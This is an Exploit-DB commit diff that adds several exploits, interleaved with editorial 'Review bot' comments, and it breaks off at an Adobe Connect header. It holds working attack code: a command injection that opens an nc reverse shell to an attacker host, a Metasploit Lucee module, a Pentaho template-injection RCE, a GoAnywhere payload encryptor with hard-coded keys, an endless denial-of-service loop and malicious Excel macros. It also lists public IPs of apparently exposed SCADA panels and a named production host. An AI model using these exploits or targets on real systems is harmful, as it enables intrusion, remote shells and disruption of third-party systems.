DB: 2023-04-09

34 changes to exploits/shellcodes/ghdb

ENTAB ERP 1.0 - Username PII leak

ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)

ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)

FortiRecorder 6.4.3 - Denial of Service

Schneider Electric v1.0 - Directory traversal & Broken Authentication

Altenergy Power Control Software C1.2.5 - OS command injection

Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)

Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)

Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu)

Lucee Scheduled Job v1.0 - Command Execution

Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)

Adobe Connect 11.4.5 - Local File Disclosure

Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)

Suprema BioStar 2 v2.8.16 - SQL Injection

Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)

dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)

GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure

Icinga Web 2.10 - Arbitrary File Disclosure

Joomla! v4.2.8 - Unauthenticated information disclosure

Medicine Tracker System v1.0 - Sql Injection

Online Appointment System V1.0 - Cross-Site Scripting (XSS)

Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)

pfsenseCE v2.6.0 - Anti-brute force protection bypass

Restaurant Management System 1.0 - SQL Injection

WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)
X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)
X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)

Microsoft Windows 11 - 'cmd.exe' Denial of Service

ActFax 10.10 - Unquoted Path Services

ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path

RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution

Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation
This commit is contained in:
Exploit-DB 2023-04-09 00:16:30 +00:00
parent 99cef8d064
commit 85954a8fad
33 changed files with 2254 additions and 36 deletions

@ -0,0 +1,28 @@
Exploit Title: ENTAB ERP 1.0 - Username PII leak
Date: 17.05.2022
Exploit Author: Deb Prasad Banerjee
Vendor Homepage: https://www.entab.in
Version: Entab ERP 1.0
Tested on: Windows IIS
CVE: CVE-2022-30076
Vulnerability Name: Broken Access control via Rate Limits
Description:
In the entab software in fapscampuscare.in, there is a login portal with a
UserId field. An authenticated user would enter and get their name as well
as other services. However, there should be a rate limit in place, which is
not present. As a result, a hacker could bypass the system and obtain other
usernames via broken access control. This enables a threat actor to
obain the complete full name and user ID of the person.
POC:
1. Go to fapscampuscare.in or any entab hosted software and find the entab
software.
2. Use a proxy to intercept the request.
3. Since it's a student login, try a random UserId (e.g., s11111).
4. Intercept the request using Burp Suite and send it to the Intruder.
5. Select payloads from number 100000-20000, and turn off URL encoding on
the UserId parameter.
6. Start the attack and sort by length to obtain the username and full name
of other users.
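
Review bot: The Description and step 1 name a specific production host (fapscampuscare.in) as the place to try this; an archived entry should use a placeholder host instead. The classification also needs tightening: the title says "Username PII leak", the Vulnerability Name says "Broken Access control via Rate Limits", and the Description blames a missing rate limit, yet what step 6 shows is the login flow returning another user's full name for a guessed UserId. Stating that as the root cause would tell a defender that the primary fix is to stop returning names for unverified IDs, with rate limiting as a secondary control. Step 5's range "100000-20000" runs high to low and does not match the format of the example ID in step 3.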

@ -19,5 +19,5 @@ POBatch
WaitDuration WaitDuration
#Final URLs #Final URLs
http://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3 http://localost:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3
http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script> http://localost:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>
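
Review bot: Both replacement URLs spell the host "localost:81"; it should read "localhost:81", otherwise the sanitised example does not resolve. Replacing the public address 20.36.214.225 with a loopback placeholder is the right direction, so check the rest of the file for remaining references to the original address.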

@ -0,0 +1,20 @@
# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)
# Date: 2023-03-30
# CVE: CVE-2023-26692
# Exploit Author: Abdulaziz Saad (@b4zb0z)
# Vendor Homepage: https://www.zcbs.nl
# Version: 4.14k
# Tested on: LAMP, Ubuntu
# Google Dork: inurl:objecten.pl?ident=3D
---
[#] Vulnerability :
`$_GET['ident']`
[#] Exploitation :
`https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror=
=3Dalert(%22XSS%22)%3E`
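
Review bot: The Google Dork line and the Exploitation URL still carry quoted-printable encoding from an e-mail submission: each "=" appears as "=3D" and the URL is split by a soft line break ("onerror=" at the end of one line, "=3D" at the start of the next). Decode the file before archiving so the text reads as the author wrote it. The Vulnerability line also uses PHP notation ($_GET['ident']) although the affected script is objecten.pl under /cgi-bin/; say plainly that the ident query parameter is reflected into the page, so a maintainer knows which input needs output encoding.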

67
exploits/hardware/dos/51326.py Executable file
@ -0,0 +1,67 @@
# Exploit Title: FortiRecorder 6.4.3 - Denial of Service
# Google Dork: N/A
# Date: 13/03/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/network-based-video-security/forticam-fortirecorder
# Version: 6.4.3 and below && 6.0.11 to 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-41333
# Security Advisory: https://www.fortiguard.com/psirt/FG-IR-22-388
# Technical Analysis: https://medium.com/@0xpolar/cve-2022-41333-71eb289d60b5
import requests
import warnings
import sys
from urllib.parse import unquote
warnings.filterwarnings('ignore', message='Unverified HTTPS request')
def POST(target, req_type, payload):
print("[+] Target : "+target)
print("[+] Request Type: POST")
print("[+] Payload : " +payload)
post_url = target+"/module/admin.fe"
post_headers = {"User-Agent": "CVE-2022-41333", "Content-Type": "application/x-www-form-urlencoded"}
url_decoder = unquote(payload)
full_payload = "fewReq="+url_decoder
while True:
r = requests.post(post_url, headers=post_headers, data=full_payload, verify=False)
if "Failed: Access denied" in r.text:
print("[+] Payload Sent.")
else:
print("[!] Something went wrong!")
print(r.text)
def GET(target, req_type, payload):
print("[+] Target : "+target)
print("[+] Request Type: GET")
print("[+] Payload : " +payload)
while True:
url = target+"/module/admin.fe?fewReq="+payload
headers = {"User-Agent": "CVE-2022-41333", "Connection": "close"}
r = requests.get(url, headers=headers, verify=False)
if "Failed: Access denied" in r.text:
print("[+] Payload Sent.")
else:
print("[!] Something went wrong!")
print(r.text)
print("[+] Starting ..")
target = str((sys.argv[1])) # https://fortirecorder.fortidemo.com
req_type = str((sys.argv[2])) # POST or GET
payload = str((sys.argv[3])) # :B:JSsrJW16blB9dXp8ayJMZmxcfnJee3J2cTltem5efGt2cHEiLio5amx6bXF+cnoi
if "post" in req_type.lower():
if "https" in target.lower() or "http" in target.lower():
POST(target, req_type, payload)
else:
print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
elif "get" in req_type.lower():
if "https" in target.lower() or "http" in target.lower():
GET(target, req_type, payload)
else:
print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
else:
print("[!] Invalid Request Type.")
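
Review bot: Both POST() and GET() run "while True:" with no iteration limit, delay or exit path, so a test run against a lab appliance can only be stopped by killing the process, and the "[!] Something went wrong!" branch keeps looping as well. Take a request count as an argument and break on an unexpected response. sys.argv[1] to sys.argv[3] are read without a length check, so a missing argument ends in an IndexError instead of a usage message, and the scheme test ("https" in target or "http" in target) is a substring match that accepts any string containing "http". The fixed User-Agent "CVE-2022-41333" and requests to /module/admin.fe with a fewReq parameter are worth naming in the header as the pattern to look for in appliance and proxy logs.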

@ -0,0 +1,38 @@
# Exploit Title: Schneider Electric v1.0 - Directory traversal & Broken Authentication
# Google Dork: inurl:/scada-vis
# Date: 3/11/2023
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: https://www.se.com/
# Version: all-versions
# Tested on: Windows/Linux/Android
# Attacker can using these dorks and access to the panel without password
inurl:/cgi-bin/scada-vis/
inurl:/scada-vis/schedulers
inurl:/cgi-bin/scada-vis/index.cgi
inurl:/scada-vis
inurl:/cgi-bin/scada-vis/touch.html
POC :
http://185.73.103.144:8080/cgi-bin/scada-vis/index.cgi
http://185.73.103.38:8080/cgi-bin/scada-vis/touch.html
http://88.213.153.98/cgi-bin/scada-vis/schedulers.cgi
# Attacker can these this dork for bruteforce the panel
inurl:/scada-vis/pin?return=index
POC :
http://143.176.129.1/scada-vis/pin?return=index
http://62.163.74.206/scada-vis/pin?return=touch
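
Review bot: The two POC blocks list five public IP addresses of what appear to be third-party installations; replace them with a placeholder such as http://[target]/cgi-bin/scada-vis/index.cgi before this is archived. The header also does not identify the product: the title reads "Schneider Electric v1.0", Version is "all-versions", and only the /scada-vis paths hint at what is affected, so name the product and the firmware tested. The title claims directory traversal, but nothing in the file shows one; the content documents panels reachable without a password and a PIN page, so either add the traversal detail or drop it from the title.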

@ -0,0 +1,53 @@
# Exploit Title: Altenergy Power Control Software C1.2.5 - OS command injection
# Google Dork: intitle:"Altenergy Power Control Software"
# Date: 15/3/2023
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://apsystems.com/
# Version: C1.2.5
# Tested on: Windows 10
# CVE : CVE-2023-28343
import requests
import argparse
def exploit(target,attacker,port):
url = f'{target}/index.php/management/set_timezone'
headers = {
'Accept': 'application/json, text/javascript, */*; q=0.01',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin': f'{target}',
'Referer': f'{target}/index.php/management/datetime',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9',
'Connection': 'close'
}
print(f"Sending Request")
data = {
'timezone': f'`mknod /tmp/pipe p;/bin/sh 0</tmp/pipe | nc
{attacker} {port} 1>/tmp/pipe`'
}
response = requests.post(url, headers=headers, data=data)
# print(response.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Parse target, attacker,
and port.',)
parser.add_argument('--target','-t', type=str, help='The target IP
address or hostname. example : http://192.168.254')
parser.add_argument('--attacker','-a', type=str, help='The attacker IP
address or hostname.')
parser.add_argument('--port', '-p',type=int, help='Listening port')
args = parser.parse_args()
try:
exploit(args.target,args.attacker,args.port)
except:
parser.print_help()
print("Exploit done")
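
Review bot: The bare "except:" around exploit(...) at the end hides every failure (missing argument, connection error, malformed URL) behind the help text, and print("Exploit done") then runs regardless, so the output never reflects what happened. Catch requests.RequestException explicitly and mark the three arguments as required. Several string literals are broken across lines (the User-Agent value, the timezone value and the argparse help strings), which looks like mail wrapping that was never undone. The header has no description at all; one sentence saying that the timezone field posted to /index.php/management/set_timezone reaches a shell would tell a defender which input to validate and which request to look for in logs.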

@ -0,0 +1,60 @@
// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)
// Google Dork: title:"GoAnywhere"
// Date: 3/26/2023
// Exploit Author: Youssef Muhammad
// Vendor Homepage: https://www.goanywhere.com/
// Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0
// Version: > 7.1.1 for windows / > 7.0.3 for Linux
// Tested on: Windows, Linux
// CVE : CVE-2023-0669
// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution
import java.util.Base64;
import javax.crypto.Cipher;
import java.nio.charset.StandardCharsets;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.file.Files;
import java.nio.file.Paths;
public class CVE_2023_0669_helper {
static String ALGORITHM = "AES/CBC/PKCS5Padding";
static byte[] KEY = new byte[30];
static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);
public static void main(String[] args) throws Exception {
if (args.length != 2) {
System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");
System.exit(1);
}
String filePath = args[0];
String version = args[1];
byte[] fileContent = Files.readAllBytes(Paths.get(filePath));
String encryptedContent = encrypt(fileContent, version);
System.out.println(encryptedContent);
}
public static String encrypt(byte[] data, String version) throws Exception {
Cipher cipher = Cipher.getInstance(ALGORITHM);
KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue();
SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES");
IvParameterSpec ivSpec = new IvParameterSpec(IV);
cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);
byte[] encryptedObject = cipher.doFinal(data);
String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);
String v = (version.equals("2")) ? "$2" : "";
bundle += v;
return bundle;
}
private static byte[] getInitializationValue() throws Exception {
// Version 1 Encryption
String param1 = "go@nywhereLicenseP@$$wrd";
byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};
return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded();
}
private static byte[] getInitializationValueV2() throws Exception {
// Version 2 Encryption
String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";
byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};
return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded();
}
}
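
Review bot: The Version line "> 7.1.1 for windows / > 7.0.3 for Linux" reads as releases above those numbers, which contradicts a title naming 7.1.1 as the affected release; state the affected range and the fixed release explicitly. The Software Link points to a Dropbox copy of an installer instead of a vendor download, which a reader cannot verify. In the code, KEY is initialised to new byte[30], which is not a valid AES key length, and is then reassigned inside encrypt(); make it a local variable there. A short comment noting that the passphrases, salts and the IV (the ASCII bytes of "AES/CBC/PKCS5Pad") are fixed constants would make clear why this encryption layer offers no protection once they are known.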

@ -0,0 +1,28 @@
# Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
# Author: dwbzn
# Date: 2022-04-04
# Vendor: https://www.hitachivantara.com/
# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html
# Version: Pentaho BA Server 9.3.0.0-428
# CVE: CVE-2022-43769, CVE-2022-43939
# Tested on: Windows 11
# Credits: https://research.aurainfosec.io/pentest/pentah0wnage
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).
# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)
import requests
import argparse
parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')
parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')
parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)
args = parser.parse_args()
url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"
print ("running...")
r = requests.get(url)
if r.text == 'false':
print ("command should've executed! nice.")
else:
print ("didn't work. sadge...")
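
Review bot: The header cites CVE-2022-43769 and CVE-2022-43939 together without saying which one covers the template injection and which the missing authentication, so a reader cannot tell which fix closes which half of the chain; add one line per CVE and the fixed release. requests.get(url) has no timeout, so the script hangs against an unresponsive host. The success message is keyed on the response body being exactly 'false' with no explanation of why that value indicates anything; document it or soften the message. The NOTE warns against notepad.exe on Linux while --cmd defaults to it.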

@ -0,0 +1,58 @@
#Exploit Title: Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu)
Product: Google Chrome
Discovered by: Rafay Baloch and Muhammad Samak
#Version: 109.0.5414.74
#Impact: Moderate
#Company: Cyber Citadel
#Website: https://www.cybercitadel.com
#Tested-on : Ubuntu 22.04.1
*Description*
Google chrome attempts to load the 'libssckbi.so' file from a user-writable location.
PATH: /home/$username/.pki/nssdb/libnssckbi.so
Since the Shared Library 'ibnssckbi.so' specified path is writeable.
It is possible to achieve the Code Execution by placing the malicious file with
the name `libnssckbi.so` in the specified path.
*exploit*
Following is the POC that could be used to reproduce the issue:
echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..."
echo "[*] Checking /.pki/nssdb PATH"
if [ -d "/home/haalim/.pki/nssdb" ]
then
echo "[+] Directory Exists..."
if [ -w "/home/haalim/.pki/nssdb" ]
then
echo "[+] Directory is writable..."
echo "[+] Directory is writable..."
echo "[+] Generating malicious File libnssckbi.so ..."
echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c
echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c
echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c
echo "}" >> /home/haalim/.pki/nssdb/exploit.c
gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o
gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o
fi
fi
Upon closing the browser windows, the application executes the malicious code
*Impact*
The attacker can use this behavior to bypass the application whitelisting rules.
This behavior can also lead to DoS attacks.
An attacker can trick a victim into supplying credentials by creating a fake prompt.
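
Review bot: The library name is spelled three ways in the Description: 'libssckbi.so', 'libnssckbi.so' and 'ibnssckbi.so'; use libnssckbi.so throughout, matching the PATH line and the script. The script hard-codes /home/haalim where the Description uses /home/$username, and the "[+] Directory is writable..." echo is duplicated. The Impact section should state the precondition: the path is inside the user's own home directory, so whoever can write there already runs code as that user, and the write-up should say what boundary is crossed beyond that. For detection, an unexpected libnssckbi.so under ~/.pki/nssdb is the artefact to name.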

331
exploits/multiple/local/51333.rb Executable file
@ -0,0 +1,331 @@
# Exploit Title: Lucee Scheduled Job v1.0 - Command Execution
# Date: 3-23-2012
# Exploit Author: Alexander Philiotis
# Vendor Homepage: https://www.lucee.org/
# Software Link: https://download.lucee.org/
# Version: All versions with scheduled jobs enabled
# Tested on: Linux - Debian, Lubuntu & Windows 10
# Ref : https://www.synercomm.com/blog/scheduled-tasks-with-lucee-abusing-built-in-functionality-for-command-execution/
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Retry
include Msf::Exploit::FileDropper
require 'base64'
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Lucee Authenticated Scheduled Job Code Execution',
'Description' => %q{
This module can be used to execute a payload on Lucee servers that have an exposed
administrative web interface. It's possible for an administrator to create a
scheduled job that queries a remote ColdFusion file, which is then downloaded and executed
when accessed. The payload is uploaded as a cfm file when queried by the target server. When executed,
the payload will run as the user specified during the Lucee installation. On Windows, this is a service account;
on Linux, it is either the root user or lucee.
},
'Targets' => [
[
'Windows Command',
{
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Type' => :windows_cmd
}
],
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd
}
]
],
'Author' => 'Alexander Philiotis', # aphiliotis@synercomm.com
'License' => MSF_LICENSE,
'References' => [
# This abuses the functionality inherent to the Lucee platform and
# thus is not related to any CVEs.
# Lucee Docs
['URL', 'https://docs.lucee.org/'],
# cfexecute & cfscript documentation
['URL', 'https://docs.lucee.org/reference/tags/execute.html'],
['URL', 'https://docs.lucee.org/reference/tags/script.html'],
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
# /opt/lucee/server/lucee-server/context/logs/application.log
# /opt/lucee/web/logs/exception.log
IOC_IN_LOGS,
ARTIFACTS_ON_DISK,
# ColdFusion files located at the webroot of the Lucee server
# C:/lucee/tomcat/webapps/ROOT/ by default on Windows
# /opt/lucee/tomcat/webapps/ROOT/ by default on Linux
]
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'DisclosureDate' => '2023-02-10'
)
)
register_options(
[
Opt::RPORT(8888),
OptString.new('PASSWORD', [false, 'The password for the administrative interface']),
OptString.new('TARGETURI', [true, 'The path to the admin interface.', '/lucee/admin/web.cfm']),
OptInt.new('PAYLOAD_DEPLOY_TIMEOUT', [false, 'Time in seconds to wait for access to the payload', 20]),
]
)
deregister_options('URIPATH')
end
def exploit
payload_base = rand_text_alphanumeric(8..16)
authenticate
start_service({
'Uri' => {
'Proc' => proc do |cli, req|
print_status("Payload request received for #{req.uri} from #{cli.peerhost}")
send_response(cli, cfm_stub)
end,
'Path' => '/' + payload_base + '.cfm'
}
})
#
# Create the scheduled job
#
create_job(payload_base)
#
# Execute the scheduled job and attempt to send a GET request to it.
#
execute_job(payload_base)
print_good('Exploit completed.')
#
# Removes the scheduled job
#
print_status('Removing scheduled job ' + payload_base)
cleanup_request = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_get' => {
'action' => 'services.schedule'
},
'vars_post' => {
'row_1' => '1',
'name_1' => payload_base.to_s,
'mainAction' => 'delete'
}
})
if cleanup_request && cleanup_request.code == 302
print_good('Scheduled job removed.')
else
print_bad('Failed to remove scheduled job.')
end
end
def authenticate
auth = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'keep_cookies' => true,
'vars_post' => {
'login_passwordweb' => datastore['PASSWORD'],
'lang' => 'en',
'rememberMe' => 's',
'submit' => 'submit'
}
})
unless auth
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
unless auth.code == 200 && auth.body.include?('nav_Security')
fail_with(Failure::NoAccess, 'Unable to authenticate. Please double check your credentials and try again.')
end
print_good('Authenticated successfully')
end
def create_job(payload_base)
create_job = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'keep_cookies' => true,
'vars_get' => {
'action' => 'services.schedule',
'action2' => 'create'
},
'vars_post' => {
'name' => payload_base,
'url' => get_uri.to_s,
'interval' => '3600',
'start_day' => '01',
'start_month' => '02',
'start_year' => '2023',
'start_hour' => '00',
'start_minute' => '00',
'start_second' => '00',
'run' => 'create'
}
})
fail_with(Failure::Unreachable, 'Could not connect to the web service') if create_job.nil?
fail_with(Failure::UnexpectedReply, 'Unable to create job') unless create_job.code == 302
print_good('Job ' + payload_base + ' created successfully')
job_file_path = file_path = webroot
fail_with(Failure::UnexpectedReply, 'Could not identify the web root') if job_file_path.blank?
case target['Type']
when :unix_cmd
file_path << '/'
job_file_path = "#{job_file_path.gsub('/', '//')}//"
when :windows_cmd
file_path << '\\'
job_file_path = "#{job_file_path.gsub('\\', '\\\\')}\\"
end
update_job = send_request_cgi({
'method' => 'POST',
'uri' => target_uri.path,
'keep_cookies' => true,
'vars_get' => {
'action' => 'services.schedule',
'action2' => 'edit',
'task' => create_job.headers['location'].split('=')[-1]
},
'vars_post' => {
'name' => payload_base,
'url' => get_uri.to_s,
'port' => datastore['SRVPORT'],
'timeout' => '50',
'username' => '',
'password' => '',
'proxyserver' => '',
'proxyport' => '',
'proxyuser' => '',
'proxypassword' => '',
'publish' => 'true',
'file' => "#{job_file_path}#{payload_base}.cfm",
'start_day' => '01',
'start_month' => '02',
'start_year' => '2023',
'start_hour' => '00',
'start_minute' => '00',
'start_second' => '00',
'end_day' => '',
'end_month' => '',
'end_year' => '',
'end_hour' => '',
'end_minute' => '',
'end_second' => '',
'interval_hour' => '1',
'interval_minute' => '0',
'interval_second' => '0',
'run' => 'update'
}
})
fail_with(Failure::Unreachable, 'Could not connect to the web service') if update_job.nil?
fail_with(Failure::UnexpectedReply, 'Unable to update job') unless update_job.code == 302 || update_job.code == 200
register_files_for_cleanup("#{file_path}#{payload_base}.cfm")
print_good('Job ' + payload_base + ' updated successfully')
end
def execute_job(payload_base)
print_status("Executing scheduled job: #{payload_base}")
job_execution = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_get' => {
'action' => 'services.schedule'
},
'vars_post' => {
'row_1' => '1',
'name_1' => payload_base,
'mainAction' => 'execute'
}
})
fail_with(Failure::Unreachable, 'Could not connect to the web service') if job_execution.nil?
fail_with(Failure::Unknown, 'Unable to execute job') unless job_execution.code == 302 || job_execution.code == 200
print_good('Job ' + payload_base + ' executed successfully')
payload_response = nil
retry_until_truthy(timeout: datastore['PAYLOAD_DEPLOY_TIMEOUT']) do
print_status('Attempting to access payload...')
payload_response = send_request_cgi(
'uri' => '/' + payload_base + '.cfm',
'method' => 'GET'
)
payload_response.nil? || (payload_response && payload_response.code == 200 && payload_response.body.exclude?('Error')) || (payload_response.code == 500)
end
# Unix systems tend to return a 500 response code when executing a shell. Windows tends to return a nil response, hence the check for both.
fail_with(Failure::Unknown, 'Unable to execute payload') unless payload_response.nil? || payload_response.code == 200 || payload_response.code == 500
if payload_response.nil?
print_status('No response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!'))
elsif payload_response.code == 200
print_good('Received 200 response from ' + payload_base + '.cfm')
output = payload_response.body.strip
if output.include?("\n")
print_good('Output:')
print_line(output)
elsif output.present?
print_good('Output: ' + output)
end
elsif payload_response.code == 500
print_status('Received 500 response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!'))
end
end
def webroot
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
return nil unless res
res.get_html_document.at('[text()*="Webroot"]')&.next&.next&.text
end
def cfm_stub
case target['Type']
when :windows_cmd
<<~CFM.gsub(/^\s+/, '').tr("\n", '')
<cfscript>
cfexecute(name="cmd.exe", arguments="/c " & toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64")),timeout=5);
</cfscript>
CFM
when :unix_cmd
<<~CFM.gsub(/^\s+/, '').tr("\n", '')
<cfscript>
cfexecute(name="/bin/bash", arguments=["-c", toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64"))],timeout=5);
</cfscript>
CFM
end
end
end
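
Review bot: The header's "Date: 3-23-2012" does not agree with 'DisclosureDate' => '2023-02-10' or with the start_year of '2023' sent in both job requests; the year looks mistyped. In create_job, the update request passes 'uri' => target_uri.path while every other request wraps it in normalize_uri, and require 'base64' sits inside the class body after the include lines instead of at the top of the file. The log and webroot paths listed as comments under 'SideEffects' are the most useful part for responders and would be better surfaced in the Description, together with the fact that the module leaves a scheduled job and a .cfm file behind if cleanup fails.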

@ -0,0 +1,58 @@
## Exploit Title: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)
## Exploit Author: nu11secur1ty
## Date: 03.16.2023
## Vendor: https://www.microsoft.com/en-us/microsoft-365/excel
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://www.invicti.com/learn/remote-code-execution-rce/
## CVE ID: CVE-2023-23399
## Description:
The malicious user can exploit the victim's PC remotely.
For example, when the score indicates that the Attack Vector is Local
and User Interaction is Required, this could describe an exploit in
which an attacker, through social engineering, convinces a victim to
download and open a specially crafted file from a website which leads
to a local attack on their computer.
STATUS: HIGH Vulnerability
[+]Exploit0:
```
Sub Check_your_salaries()
CreateObject("Shell.Application").ShellExecute
"microsoft-edge:https://attacker.com"
End Sub
```
[+]Exploit1:
```
Sub cmd()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "cmd.exe"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399)
## Proof and Exploit:
[href](https://streamable.com/dnyfx0)
## Time spend:
03:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
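
Review bot: The Description is generic CVSS wording (Attack Vector Local, User Interaction Required) and never says what in Excel is flawed or how the two macros relate to CVE-2023-23399; both are ordinary VBA calls (Shell.Application ShellExecute and Shell), and the entry should state what conditions, such as macro settings, were in place when they ran. In Exploit0 the ShellExecute call and its argument sit on separate lines without a line continuation. The trailing signature block (job titles, two URLs run together as "https://packetstormsecurity.com/https://cve.mitre.org/index.html", and an encoded string) is not part of the advisory and should be dropped, and the "[href]" link labels should be replaced with descriptive text.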

@ -0,0 +1,41 @@
# Title: Adobe Connect 11.4.5 - Local File Disclosure
# Author: h4shur
# date:2021.01.16-2023.02.17
# CVE: CVE-2023-22232
# Vendor Homepage: https://www.adobe.com
# Software Link: https://www.adobe.com/products/adobeconnect.html
# Version: 11.4.5 and earlier, 12.1.5 and earlier
# User interaction: None
